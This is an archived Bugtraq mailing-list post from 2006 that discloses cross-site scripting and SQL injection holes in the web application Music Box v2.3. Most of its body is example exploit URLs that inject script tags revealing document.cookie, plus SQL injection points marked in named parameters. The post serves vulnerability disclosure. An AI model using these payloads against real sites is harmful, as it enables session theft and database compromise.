Bugtraq mailing list archives
XSS & SQL Injection in Music Box v2.3
From: xx_hack_xx_2004 () hotmail com
Date: 24 Mar 2006 21:43:12 -0000
Hello Vulnerable: Music Box v2.3 http://www.MusicboxV2.com Exploit : XSS : http://example.com/music/index.php?id='><script>alert(document.cookie)</script> http://example.com/music/index.php?action=top&show=5&type='><script>alert(document.cookie)</script> http://example.com/music/index.php?action=top&show='><script>alert(document.cookie)</script>&type=Artists http://example.com/music/cart/cart.php?message1='><script>alert(document.cookie)</script> http://example.com/music/cart/cart.php?message='><script>alert(document.cookie)</script> SQL : http://example.com/music/index.php?action=top&show=5&type=[SQL] http://example.com/music/index.php?action=top&show=[SQL]&type=Artists Discovery by Linux_Drox http://www.lezr.com Best Regards ,,
Current thread:
- XSS & SQL Injection in Music Box v2.3 xx_hack_xx_2004 (Mar 27)